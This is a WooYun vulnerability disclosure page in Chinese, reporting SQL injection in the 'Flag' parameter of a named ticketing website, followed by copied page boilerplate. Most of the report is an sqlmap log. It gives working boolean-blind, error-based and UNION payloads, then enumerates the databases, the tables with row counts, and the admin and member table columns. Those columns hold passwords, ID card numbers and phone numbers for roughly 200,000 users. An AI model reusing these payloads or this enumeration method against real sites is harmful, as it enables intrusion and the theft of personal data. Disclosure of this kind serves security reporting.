中国票务中心某站存在SQL注入（可获取20万用户信息+大量记录信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152363

漏洞标题：中国票务中心某站存在SQL注入（可获取20万用户信息+大量记录信息）

漏洞作者：路人甲

提交时间：2015-12-07 11:27

修复时间：2016-01-21 11:30

公开时间：2016-01-21 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-07：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-01-21：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

没有提交重复吧！~~~趁着回来休息的时间测试一下，晚上都不知道搞到什么时候，所以先提交了！~~~

详细说明：

首先，地址是

http://www.51piao.com/Flight/FlightSale.aspx?Flag=2

Flag存在注入

http://www.51piao.com/Flight/FlightSale.aspx?Flag=2'

测试返回结果

“/”应用程序中的服务器错误。
字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort] asc' 附近有语法错误。
说明: 执行当前 Web 请求期间，出现未处理的异常。请检查堆栈跟踪信息，以了解有关该错误以及代码中导致错误的出处的详细信息。 
异常详细信息: System.Exception: 字符串 ') order by [BeginTimeSort] asc' 之前有未闭合的引号。 第 1 行: ') order by [BeginTimeSort] 
asc' 附近有语法错误。

这样应该是有注入了吧！~~~

[*] starting at 16:15:42
[16:15:42] [INFO] testing connection to the target URL
[16:15:44] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[16:15:45] [INFO] target URL is stable
[16:15:45] [INFO] testing if GET parameter 'Flag' is dynamic
[16:15:46] [INFO] confirming that GET parameter 'Flag' is dynamic
[16:15:47] [INFO] GET parameter 'Flag' is dynamic
[16:15:47] [WARNING] reflective value(s) found and filtering out
[16:15:47] [INFO] heuristic (basic) test shows that GET parameter 'Flag' might b
e injectable
[16:15:47] [INFO] testing for SQL injection on GET parameter 'Flag'
[16:15:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:15:52] [INFO] GET parameter 'Flag' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[16:15:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[16:15:59] [INFO] GET parameter 'Flag' is 'Microsoft SQL Server/Sybase AND error
-based - WHERE or HAVING clause' injectable
[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:15:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:15:59] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[16:16:05] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[16:16:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:16:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:16:29] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[16:16:29] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[16:16:33] [INFO] target URL appears to have 1 column in query
[16:16:33] [INFO] GET parameter 'Flag' is 'Generic UNION query (NULL) - 1 to 20
columns' injectable
GET parameter 'Flag' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 22 HTTP(s) requ
ests:
---
Place: GET
Parameter: Flag
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Flag=2) AND 4749=4749 AND (2763=2763
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Flag=2) AND 7428=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(120)+
CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (7428=7428) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113))) AND (4091=4091
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: Flag=2) UNION ALL SELECT CHAR(113)+CHAR(117)+CHAR(120)+CHAR(109)+CH
AR(113)+CHAR(67)+CHAR(114)+CHAR(98)+CHAR(81)+CHAR(79)+CHAR(100)+CHAR(84)+CHAR(89
)+CHAR(65)+CHAR(83)+CHAR(113)+CHAR(104)+CHAR(98)+CHAR(107)+CHAR(113)--
---
[16:16:53] [INFO] testing Microsoft SQL Server
[16:16:53] [INFO] confirming Microsoft SQL Server
[16:16:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[16:20:37] [INFO] testing Microsoft SQL Server
[16:20:37] [INFO] confirming Microsoft SQL Server
[16:20:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[16:20:38] [INFO] fetching current user
current user:    'web61247'
[16:20:38] [INFO] fetching current database
current database:    'www_51piao_com'
[16:20:38] [INFO] testing if current user is DBA
current user is DBA:    False
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] www_51piao_com
Database: www_51piao_com
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.OrderLog                 | 960682  |
| dbo.TicketPrice              | 370811  |
| dbo.vMemberAll               | 341363  |
| dbo.vTicketPrice             | 248395  |
| dbo.MemberAddrBook           | 205929  |
| dbo.OrderMain                | 179388  |
| dbo.OprLog                   | 178075  |
| dbo.vEmailAll                | 130014  |
| dbo.MemberPointLog           | 126487  |
| dbo.TicketOrderDetail        | 124568  |
| dbo.TicketOrderDetail        | 124568  |
| dbo.TicketOrderDetail        | 124568  |
| dbo.vTicketOrderStat         | 124568  |
| dbo.vFlightTicketOrder       | 121543  |
| dbo.SmsLog                   | 110904  |
| dbo.vTicketOrder             | 106021  |
| dbo.vMobileTemp              | 98098   |
| dbo.vMoibleAll               | 98098   |
| dbo.vMobileAllOrder          | 98088   |
| dbo.vMemberTemp              | 93105   |
| dbo.MemberMoneyLog           | 81838   |
| dbo.TicketPlay               | 81607   |
| dbo.VTicketPlayMag           | 81561   |
| dbo.FlightLog                | 72994   |
| dbo.TrainNew                 | 70195   |
| dbo.TrainNew                 | 70195   |
| dbo.vLoginLog                | 58664   |
| dbo.ImagesTicket             | 37727   |
| dbo.monitor                  | 36593   |
| dbo.FlightOrderDetail        | 31300   |
| dbo.FlightOrderDetail        | 31300   |
| dbo.vFlightOrderDetail       | 21042   |
| dbo.vFlightOrderDetail       | 21042   |
| dbo.vTicketDetail            | 14126   |
| dbo.vTicketMag               | 14126   |
| dbo.OrderPayCard             | 13596   |
| dbo.vOrderPayCard            | 13596   |
| dbo.MemberLog                | 11974   |
| dbo.vFlightTicketSend        | 10295   |
| dbo.AccountAll               | 8329    |
| dbo.TicketPreOrder           | 6293    |
| dbo.vTicketAddrUse           | 5225    |
| dbo.vTicketAddrUse           | 5225    |
| dbo.TicketReview             | 3253    |
| dbo.FlightLogStat            | 2756    |
| dbo.vTicketReviewList        | 2647    |
| dbo.FlightKM                 | 1398    |
| dbo.o_kehu                   | 1317    |
| dbo.ImagesCommon             | 860     |
| dbo.WebTop                   | 858     |
| dbo.JOYCOMPANY               | 786     |
| dbo.VJoyCompanyMag           | 786     |
| dbo.VJoyCompanyMag           | 786     |
| dbo.LinkInfo                 | 780     |
| dbo.CITY                     | 647     |
| dbo.AgentInfo                | 526     |
| dbo.VChinaCity               | 455     |
| dbo.VNewsHelp1               | 416     |
| dbo.VNewsHelp1               | 416     |
| dbo.PointProductOrder        | 293     |
| dbo.PointProductOrder        | 293     |
| dbo.vTicketBig               | 280     |
| dbo.vTicketHomeTop           | 279     |
| dbo.MemberWebUnion           | 210     |
| dbo.vTicketLeft              | 176     |
| dbo.vTicketSmall             | 155     |
| dbo.FlightCityCode           | 152     |
| dbo.FlightSale               | 144     |
| dbo.VFlightSale              | 141     |
| dbo.Area                     | 131     |
| dbo.Users                    | 116     |
| dbo.vUserMag                 | 116     |
| dbo.BlackIp                  | 103     |
| dbo.REGION                   | 96      |
| dbo.vTrainTrade              | 65      |
| dbo.TrainTradeBak            | 60      |
| dbo.TrainTradeBak            | 60      |
| dbo.NewsHelpModule           | 57      |
| dbo.NewsHelpModule           | 57      |
| dbo.sysconstraints           | 54      |
| dbo.vPointProduct1           | 44      |
| dbo.vPointProduct1           | 44      |
| dbo.VTravelLine1             | 35      |
| dbo.VTravelLine1             | 35      |
| dbo.vTravelLineDetail        | 35      |
| dbo.Province                 | 34      |
| dbo.vMobileAllTrain          | 26      |
| web61247.pangolin_test_table | 26      |
| dbo.vTicketTypeCount         | 22      |
| dbo.vTicketTypeCount         | 22      |
| dbo.TempSql                  | 17      |
| dbo.vJoyCompanyTop           | 17      |
| dbo.TicketType               | 14      |
| dbo.OrderPayMethod           | 12      |
| dbo.FlightSpec               | 11      |
| dbo.vFlightSpec              | 11      |
| web61247.D99_Tmp             | 11      |
| dbo.MemberGroup              | 10      |
| dbo.SmsTemplate              | 10      |
| dbo.vSmsTemplate             | 10      |
| dbo.vTemp                    | 10      |
| dbo.BaseCreditCard           | 9       |
| dbo.WebModule                | 9       |
| dbo.vWebCity                 | 8       |
| dbo.WebCity                  | 8       |
| dbo.BlackList                | 7       |
| dbo.SmsEvent                 | 7       |
| dbo.BbsBanner                | 6       |
| dbo.Groups                   | 6       |
| dbo.OrderFlightTakeAddr      | 6       |
| dbo.PointProductType         | 5       |
| dbo.vHomeTicket              | 5       |
| dbo.vSmsModule               | 5       |
| dbo.vHotelOrder              | 4       |
| dbo.syssegments              | 3       |
| dbo.BaseYesNo                | 2       |
| dbo.FlightTicketAddr         | 2       |
| dbo.PriceType                | 2       |
| dbo.CompanySeq               | 1       |
| dbo.FlightSaleTop            | 1       |
| dbo.OrderSeq                 | 1       |
| dbo.TravelCompany            | 1       |
+------------------------------+---------+
不知道获取整个数据库的count的时候member没有了，还好上次测试的时候发现有members这个，所以似乎用户又多了一些了！~~~
Database: www_51piao_com
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| dbo.Member   | 198778  |
| dbo.vMember  | 198778  |
| dbo.Users    | 116     |
| dbo.vUserMag | 116     |
+--------------+---------+
Database: www_51piao_com
Table: Users
[9 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| ID            |
| IsDisabled    |
| LastLoginTime |
| LEVELID       |
| LoginCount    |
| Password      |
| PurView       |
| UserName      |
+---------------+
Database: www_51piao_com
Table: vUserMag
[10 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| DepartName    |
| ID            |
| IsDisabled    |
| LastLoginTime |
| LEVELID       |
| LoginCount    |
| Password      |
| PurView       |
| UserName      |
+---------------+
Database: www_51piao_com
Table: Member
[43 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| Address       |
| Balance       |
| BirthDay      |
| CardNo        |
| CardType      |
| CityId        |
| COMPANYADDR   |
| CompanyId     |
| CompanyName   |
| COMPANYTEL    |
| CompanyType   |
| Degree        |
| Email         |
| FAX           |
| GroupId       |
| ID            |
| ISAuditing    |
| IsBindMobile  |
| IsChinese     |
| IsDesignWeb   |
| IsDisabled    |
| IsMailList    |
| IsWeb         |
| LastLoginTime |
| LoginCount    |
| MemberType    |
| MEMO          |
| MOBILE        |
| Name          |
| NickName      |
| openid        |
| POINT         |
| ProvinceId    |
| Pwd           |
| RegDate       |
| SEX           |
| STAFFID       |
| STAFFNAME     |
| TEL           |
| VipMoney      |
| VipNo         |
| ZIPCODE       |
+---------------+
Database: www_51piao_com
Table: vMember
[45 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| Address       |
| Balance       |
| BirthDay      |
| CardNo        |
| CardType      |
| City          |
| CityId        |
| COMPANYADDR   |
| CompanyId     |
| CompanyName   |
| COMPANYTEL    |
| CompanyType   |
| Degree        |
| Email         |
| FAX           |
| GroupId       |
| GroupName     |
| ID            |
| ISAuditing    |
| IsBindMobile  |
| IsChinese     |
| IsDesignWeb   |
| IsDisabled    |
| IsMailList    |
| IsWeb         |
| LastLoginTime |
| LoginCount    |
| MemberType    |
| MEMO          |
| MOBILE        |
| Name          |
| NickName      |
| openid        |
| POINT         |
| ProvinceId    |
| Pwd           |
| RegDate       |
| SEX           |
| STAFFID       |
| STAFFNAME     |
| TEL           |
| VipMoney      |
| VipNo         |
| ZIPCODE       |
+---------------+

数据挺大的，就不继续了！~~~~而且时间关系，赶着出去，也就不往下测试了，明天再测试其他的！~~~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152363

漏洞标题：中国票务中心某站存在SQL注入（可获取20万用户信息+大量记录信息）

相关厂商：中国票务中心

漏洞作者：路人甲

提交时间：2015-12-07 11:27

修复时间：2016-01-21 11:30

公开时间：2016-01-21 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152363

漏洞标题：中国票务中心某站存在SQL注入（可获取20万用户信息+大量记录信息）

相关厂商：中国票务中心

漏洞作者： 路人甲

提交时间：2015-12-07 11:27

修复时间：2016-01-21 11:30

公开时间：2016-01-21 11:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0152363"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云